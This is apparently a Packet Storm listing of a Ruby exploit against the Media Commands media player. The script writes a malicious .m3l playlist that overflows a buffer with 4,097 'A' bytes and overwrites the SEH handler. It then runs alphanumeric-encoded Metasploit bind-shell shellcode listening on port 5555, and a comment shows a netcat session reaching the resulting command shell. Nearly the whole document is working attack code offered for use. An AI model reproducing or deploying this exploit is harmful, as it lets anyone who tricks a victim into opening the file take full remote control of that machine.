Media Commands local buffer overflow exploit that creates a malicious .m3l file.
7ca25845f3bb0815393b872c0f25e86a1b46d43762d96eabee23fef2aa5393a4#!/usr/bin/env ruby
# Media Commands .m3l Local Buffer Overflow Exploit
# By Mountassif Moad
# Down : http://www.mediacommands.com/download/&product=MCV100A.exe
# C:\nc>nc -v 127.0.0.1 5555
# DNS fwd/rev mismatch: localhost != stack-f286641
# localhost [127.0.0.1] 5555 (?) open
# Microsoft Windows XP [version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\Program Files\Media Commands\Animation>
# exit Booooooooooom
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
moad = gets.chomp.capitalize
puts "Name Of File : " + moad +'.m3l'
time1 = Time.new
$VERBOSE=nil
Header =
"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74"+
"\x5D\x0D\x4E\x75\x6D\x62\x65\x72"+
"\x4F\x66\x45\x6E\x74\x72\x69\x65"+
"\x73\x3D\x31\x0D\x46\x69\x6C\x65\x31\x3D"
# win32_bind - EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
Shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"+
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"+
"\x4e\x46\x46\x42\x46\x52\x4b\x58\x45\x44\x4e\x53\x4b\x48\x4e\x47"+
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x48"+
"\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48"+
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"+
"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x32\x4b\x58"+
"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x56\x43\x4c\x41\x43\x4b\x4d"+
"\x46\x46\x4b\x58\x43\x34\x42\x43\x4b\x48\x42\x34\x4e\x50\x4b\x58"+
"\x42\x37\x4e\x41\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x35\x4a\x36"+
"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46"+
"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x37"+
"\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"+
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"+
"\x48\x36\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x30"+
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45"+
"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x35\x43\x45\x43\x55\x43\x34"+
"\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x45\x41"+
"\x43\x4b\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x39\x4a\x56\x46\x4a"+
"\x4c\x31\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41"+
"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"+
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"+
"\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"+
"\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56"+
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x35"+
"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x46"+
"\x4d\x46\x49\x48\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c"+
"\x49\x48\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c"+
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x32"+
"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"+
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f"+
"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x45\x41\x45\x41\x45\x4c\x56"+
"\x41\x30\x41\x45\x41\x55\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x56"+
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"+
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f"+
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"+
"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x55\x43\x55\x4f\x4f\x48\x4d"+
"\x4f\x4f\x42\x4d\x5a"
Bof = "\x41" * 4097
Nseh = "\xEB\x06\x90\x90"
seh = "\x35\x2F\xC6\x72"
Nop = "\x90" * 15
crash = Header + Bof + Nseh + seh + Nop + Shellcode
File.open( moad+".m3l", "w" ) do |the_file|
the_file.puts(crash)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + moad +".m3l :d"
end
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed